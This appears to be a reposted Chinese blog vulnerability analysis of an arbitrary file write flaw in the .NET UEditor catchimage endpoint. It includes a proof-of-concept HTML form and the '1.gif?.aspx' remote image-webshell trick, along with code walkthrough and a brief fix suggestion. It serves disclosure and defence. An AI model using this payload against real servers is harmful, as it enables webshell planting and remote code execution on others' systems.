0x01 前言
UEditor是由百度WEB前端研发部开发的所见即所得的开源富文本编辑器,具有轻量、可定制、用户体验优秀等特点 ,被广大WEB应用程序所使用;本次爆出的高危漏洞属于.NET版本,其它的版本暂时不受影响。漏洞成因是在抓取远程数据源的时候未对文件后缀名做验证导致任意文件写入漏洞,黑客利用此漏洞可以在服务器上执行任意指令,综合评级高危。由于时间仓促,本文分析不到位的地方还请多多谅解。
0x02 漏洞利用
笔者本地测试的编辑器是百度官方下载最新的版本1.4.3.3 http://ueditor.baidu.com/website/download.html
![[转]UEditor编辑器两个版本任意文件上传漏洞分析](https://image.shishitao.com:8440/aHR0cDovL2Jic21heC5pa2FmYW4uY29tL3N0YXRpYy9MM0J5YjNoNUwyaDBkSEJ6TDJsdFp6SXdNVGd1WTI1aWJHOW5jeTVqYjIwdllteHZaeTh4TlRjME1qQTFMekl3TVRneE1pOHhOVGMwTWpBMUxUSXdNVGd4TWpNd01URXdORE15TkRRMkxURXhORGt6TVRnek9EZ3VjRzVuLmpwZw%3D%3D.jpg?w=700&webp=1 "[转]UEditor编辑器两个版本任意文件上传漏洞分析")
本地构造一个html,因为不是上传漏洞所以enctype 不需要指定为multipart/form-data , 之前见到有poc指定了这个值。完整的poc如下
<form action="http://xxxxxxxxx/controller.ashx?action=catchimage" enctype="application/x-www-form-urlencoded" method="POST">
<p>shell addr: <input type="text" name="source[]" /></p >
<input type="submit" value="Submit" />
</form>
需准备一个图片马儿,远程shell地址需要指定扩展名为 1.gif?.aspx
![[转]UEditor编辑器两个版本任意文件上传漏洞分析](https://image.shishitao.com:8440/aHR0cDovL2Jic21heC5pa2FmYW4uY29tL3N0YXRpYy9MM0J5YjNoNUwyaDBkSEJ6TDJsdFp6SXdNVGd1WTI1aWJHOW5jeTVqYjIwdllteHZaeTh4TlRjME1qQTFMekl3TVRneE1pOHhOVGMwTWpBMUxUSXdNVGd4TWpNd01URXdOalUwTURRd0xURTJNelF5T0RRMUxuQnVadz09LmpwZw%3D%3D.jpg?w=700&webp=1 "[转]UEditor编辑器两个版本任意文件上传漏洞分析")
成功返回webshell
![[转]UEditor编辑器两个版本任意文件上传漏洞分析](https://image.shishitao.com:8440/aHR0cDovL2Jic21heC5pa2FmYW4uY29tL3N0YXRpYy9MM0J5YjNoNUwyaDBkSEJ6TDJsdFp6SXdNVGd1WTI1aWJHOW5jeTVqYjIwdllteHZaeTh4TlRjME1qQTFMekl3TVRneE1pOHhOVGMwTWpBMUxUSXdNVGd4TWpNd01URXdOekl4T0RreUxUYzVNamN4TXpnNE55NXdibWM9LmpwZw%3D%3D.jpg?w=700&webp=1 "[转]UEditor编辑器两个版本任意文件上传漏洞分析")
0x03 漏洞分析
在本地IIS中将目录快速指向到解压后的目录,再访问 controller.ashx 控制器文件。当出现下图的时候表示编辑器成功运行。
![[转]UEditor编辑器两个版本任意文件上传漏洞分析](https://image.shishitao.com:8440/aHR0cDovL2Jic21heC5pa2FmYW4uY29tL3N0YXRpYy9MM0J5YjNoNUwyaDBkSEJ6TDJsdFp6SXdNVGd1WTI1aWJHOW5jeTVqYjIwdllteHZaeTh4TlRjME1qQTFMekl3TVRneE1pOHhOVGMwTWpBMUxUSXdNVGd4TWpNd01URXdPRE0yTURreExURXlOVFkxT0RReU9EZ3VjRzVuLmpwZw%3D%3D.jpg?w=700&webp=1 "[转]UEditor编辑器两个版本任意文件上传漏洞分析")
控制器中存在多个动作的调用,包含了uploadimage、uploadscrawl、uploadvideo、uploadfile、catchimage等等
![[转]UEditor编辑器两个版本任意文件上传漏洞分析](https://image.shishitao.com:8440/aHR0cDovL2Jic21heC5pa2FmYW4uY29tL3N0YXRpYy9MM0J5YjNoNUwyaDBkSEJ6TDJsdFp6SXdNVGd1WTI1aWJHOW5jeTVqYjIwdllteHZaeTh4TlRjME1qQTFMekl3TVRneE1pOHhOVGMwTWpBMUxUSXdNVGd4TWpNd01URXhNVEF5TkRReExUWTJORGsyTURjeU15NXdibWM9LmpwZw%3D%3D.jpg?w=700&webp=1 "[转]UEditor编辑器两个版本任意文件上传漏洞分析")
这些动作默认情况下都可以远程访问,不排除还有新的高危漏洞;这篇文章重点来介绍catchimage这个分支条件,由于它实例化了CrawlerHandler这个类,所以需要跟进这个一般处理程序类
![[转]UEditor编辑器两个版本任意文件上传漏洞分析](https://image.shishitao.com:8440/aHR0cDovL2Jic21heC5pa2FmYW4uY29tL3N0YXRpYy9MM0J5YjNoNUwyaDBkSEJ6TDJsdFp6SXdNVGd1WTI1aWJHOW5jeTVqYjIwdllteHZaeTh4TlRjME1qQTFMekl3TVRneE1pOHhOVGMwTWpBMUxUSXdNVGd4TWpNd01URXhPVFV3TVRZeUxUTTNPVFUyTnpjek5DNXdibWM9LmpwZw%3D%3D.jpg?w=700&webp=1 "[转]UEditor编辑器两个版本任意文件上传漏洞分析")
第一行就获取了外界传入的source[] 数组, 核心调用位于Crawlers = Sources.Select(x => new Crawler(x, Server).Fetch()).ToArray();通过这段lambda表达式来调用类里的方法执行后的结果 ,如下图跟进Fecth方法体内
![[转]UEditor编辑器两个版本任意文件上传漏洞分析](https://image.shishitao.com:8440/aHR0cDovL2Jic21heC5pa2FmYW4uY29tL3N0YXRpYy9MM0J5YjNoNUwyaDBkSEJ6TDJsdFp6SXdNVGd1WTI1aWJHOW5jeTVqYjIwdllteHZaeTh4TlRjME1qQTFMekl3TVRneE1pOHhOVGMwTWpBMUxUSXdNVGd4TWpNd01URXlNREkwTmpjNUxUYzFNREF3TmpFM05pNXdibWM9LmpwZw%3D%3D.jpg?w=700&webp=1 "[转]UEditor编辑器两个版本任意文件上传漏洞分析")
首先通过IsExternalIPAddress方法判断是否是一个可被DNS解析的域名地址,如果不是就终止运行;逻辑代码如下
![[转]UEditor编辑器两个版本任意文件上传漏洞分析](https://image.shishitao.com:8440/aHR0cDovL2Jic21heC5pa2FmYW4uY29tL3N0YXRpYy9MM0J5YjNoNUwyaDBkSEJ6TDJsdFp6SXdNVGd1WTI1aWJHOW5jeTVqYjIwdllteHZaeTh4TlRjME1qQTFMekl3TVRneE1pOHhOVGMwTWpBMUxUSXdNVGd4TWpNd01URXlNRFE0T0RBekxURXpOVEF3TmpRd016VXVjRzVuLmpwZw%3D%3D.jpg?w=700&webp=1 "[转]UEditor编辑器两个版本任意文件上传漏洞分析")
这句判断就是 1.5.0开发版本(https://github.com/fex-team/ueditor/blob/dev-1.5.0/net/App_Code/CrawlerHandler.cs)和官方发布版本1.4.3.3最大的区别,在1.5.0版本中删除了此处的判断,导致在任意一个ip地址或域名下都可以执行exp如下图
![[转]UEditor编辑器两个版本任意文件上传漏洞分析](https://image.shishitao.com:8440/aHR0cDovL2Jic21heC5pa2FmYW4uY29tL3N0YXRpYy9MM0J5YjNoNUwyaDBkSEJ6TDJsdFp6SXdNVGd1WTI1aWJHOW5jeTVqYjIwdllteHZaeTh4TlRjME1qQTFMekl3TVRneE1pOHhOVGMwTWpBMUxUSXdNVGd4TWpNd01URXlNVEExTmpnMExUa3hNell3TVRnd01DNXdibWM9LmpwZw%3D%3D.jpg?w=700&webp=1 "[转]UEditor编辑器两个版本任意文件上传漏洞分析")
相对来说1.5.0版本更加容易触发此漏洞;而在1.4.3.3版本中攻击者需要提供一个正常的域名地址就可以绕过此处判断;
然后进入第二个条件判断 : 对文件ContentType的识别
![[转]UEditor编辑器两个版本任意文件上传漏洞分析](https://image.shishitao.com:8440/aHR0cDovL2Jic21heC5pa2FmYW4uY29tL3N0YXRpYy9MM0J5YjNoNUwyaDBkSEJ6TDJsdFp6SXdNVGd1WTI1aWJHOW5jeTVqYjIwdllteHZaeTh4TlRjME1qQTFMekl3TVRneE1pOHhOVGMwTWpBMUxUSXdNVGd4TWpNd01URXlNVEl5TnpFM0xUSTFPVGMwT1RZNU1pNXdibWM9LmpwZw%3D%3D.jpg?w=700&webp=1 "[转]UEditor编辑器两个版本任意文件上传漏洞分析")
这段代码很眼熟,一般常见于php文件上传的时候对文件头的判断,这段代码很容易绕过,只需要构造一张图片马儿就可以绕过它的判断,或者构造一个gif89的假图片也可以绕过;最后编辑器根据配置文件的信息创建对应的目录结构再保存文件,代码如下
![[转]UEditor编辑器两个版本任意文件上传漏洞分析](https://image.shishitao.com:8440/aHR0cDovL2Jic21heC5pa2FmYW4uY29tL3N0YXRpYy9MM0J5YjNoNUwyaDBkSEJ6TDJsdFp6SXdNVGd1WTI1aWJHOW5jeTVqYjIwdllteHZaeTh4TlRjME1qQTFMekl3TVRneE1pOHhOVGMwTWpBMUxUSXdNVGd4TWpNd01URXlNVE0xT1RjMUxUSXdNVE15TmpNeU1EY3VjRzVuLmpwZw%3D%3D.jpg?w=700&webp=1 "[转]UEditor编辑器两个版本任意文件上传漏洞分析")
至此RCE漏洞原理大致已经清楚明了,期待官方尽快发布漏洞补丁程序。
0x04 防御措施
修改CrawlerHandler.cs 增加对文件扩展名的;IPS等防御产品可以加入相应的特征;
---------------------
作者:Ivan1ee
来源:CNBLOGS
原文:https://www.cnblogs.com/Ivan1ee/p/10198866.html
版权声明:本文为作者原创文章,转载请附上博文链接!
内容解析By:CSDN,CNBLOG博客文章一键转载插件
[转]UEditor编辑器两个版本任意文件上传漏洞分析的更多相关文章
-
UEditor编辑器两个版本任意文件上传漏洞分析
0x01 前言 UEditor是由百度WEB前端研发部开发的所见即所得的开源富文本编辑器,具有轻量.可定制.用户体验优秀等特点 ,被广大WEB应用程序所使用:本次爆出的高危漏洞属于.NET版本,其它的 ...
-
【代码审计】JTBC(CMS)_PHP_v3.0 任意文件上传漏洞分析
0x00 环境准备 JTBC(CMS)官网:http://www.jtbc.cn 网站源码版本:JTBC_CMS_PHP(3.0) 企业版 程序源码下载:http://download.jtbc. ...
-
【代码审计】QYKCMS_v4.3.2 任意文件上传漏洞分析
0x00 环境准备 QYKCMS官网:http://www.qykcms.com/ 网站源码版本:QYKCMS_v4.3.2(企业站主题) 程序源码下载:http://bbs.qingyunke. ...
-
【代码审计】CLTPHP_v5.5.3 前台任意文件上传漏洞分析
0x00 环境准备 CLTPHP官网:http://www.cltphp.com 网站源码版本:CLTPHP内容管理系统5.5.3版本 程序源码下载:https://gitee.com/chich ...
-
关于finecms v5 会员头像 任意文件上传漏洞分析
看到我私藏的一个洞被别人提交到补天拿奖金,所以我干脆在社区这里分享,给大家学习下 本文原创作者:常威,本文属i春秋原创奖励计划,未经许可禁止转载! 1.定位功能 下载源码在本地搭建起来后,正常登陆了用 ...
-
PHPCMS v9.6.0 任意文件上传漏洞分析
引用源:http://paper.seebug.org/273/ 配置了php debug的环境,并且根据这篇文章把流程走了一遍,对phpstorm的debug熟练度+1(跟pycharm一样) 用户 ...
-
WebLogic 两处任意文件上传漏洞动态分析(CVE-2018-2894)
0x01 前言 CNCERT前几天发公告称发现Oracle公司出品的基于JavaEE结构的中间件WebLogic产品存在一个远程上传漏洞,并得到了厂商的确认,危害程度评分高达9.8分.鉴于厂商已进行了 ...
-
CKFinder 1.4.3 任意文件上传漏洞
CKFinder 是国外一款非常流行的所见即所得文字编辑器,其1.4.3 asp.net版本存在任意文件上传漏洞,攻击者可以利用该漏洞上传任意文件. CKFinder在上传文件的时候,强制将文件名(不 ...
-
13.Weblogic任意文件上传漏洞(CVE-2018-2894)复现
Weblogic任意文件上传漏洞(CVE-2018-2894)复现 漏洞背景 WebLogic管理端未授权的两个页面存在任意上传getshell漏洞,可直接获取权限.两个页面分别为/ws_utc/be ...
随机推荐
-
jmeter 测试java协议经验总结
对java协议的良好支持,是jmeter比loadrunner优秀的地方,但是坑也不少,本文将相关点都整理下来备忘 一. 依赖的jar包 使用IDE开发jemter java协议脚本时,需要导入以下几 ...
-
C 语言中实现数据与方法的封装
在 C 语言中可以用结构体代替类,用函数指针代替成员方法,实现数据成员与成员方法的封装,在客户端写出的程序与 C++ 类似,唯一的不同是 C 语言中调用函数指针成员时必须将本对象的地址传给函数,因为 ...
-
学习笔记TF011:多层神经网络
线性回归.对数几率回归模型,本质上是单个神经元.计算输入特征加权和.偏置视为每个样本输入特征为1权重,计算特征线性组合.激活(传递)函数 计算输出.线性回归,恒等式(值不变).对数几率回归,sigmo ...
-
八皇后问题(C#)
八皇后问题,是一个古老而著名的问题,是回溯算法的典型案例.该问题是国际西洋棋棋手马克斯·贝瑟尔于1848年提出:在8×8格的国际象棋上摆放八个皇后,使其不能互相攻击,即任意两个皇后都不能处于同一行.同 ...
-
js知识点总结
组成 ECMAscript 基础语法 变量 数据类型 运算符 数组 函数 对象BOM 浏览器对象模型 window对象(获取浏览器宽高) history对象 locat ...
-
Oracle 关联查询
select count(1),a.policy_id from gp_pol_prod a where a.product_id=8401 group by a.policy_id having c ...
-
aliyun centos14.04 trusty 上安装docker1.12.1
现在apt这边拿到的docker最新版本就是1.12.1 其实本来这次不准备记录了,本以为一帆风顺的安装最后还是遇到了一点坑,aliyun的锅,卡成狗无法下载.青岛机房 1.更新源,然后安装ca-ce ...
-
实践 : Ubuntu 上 Testlink 部署
1.安装apache sudo apt-get install apache2 2. sudo /etc/init.d/apache2 restart 测试: Http:\localhost or I ...
-
转--让一个运行在SYSTEM权限下的进程与当前用户的桌面进行交互
#define DESKTOP_ALL ( DESKTOP_READOBJECTS | DESKTOP_CreateWINDOW | \ DESKTOP_CreateMENU | DESKTOP_HO ...
-
无效GRANT语句导致主从同步断开
最近遇到一个主从同步断开的案例,是由于在执行GRANT语句时,授权对象给错了,也就可以理解为无效的GRANT语句,我们收到slave库同步断开的报警信息,然后去找问题,发现binlog有报错,报错提示 ...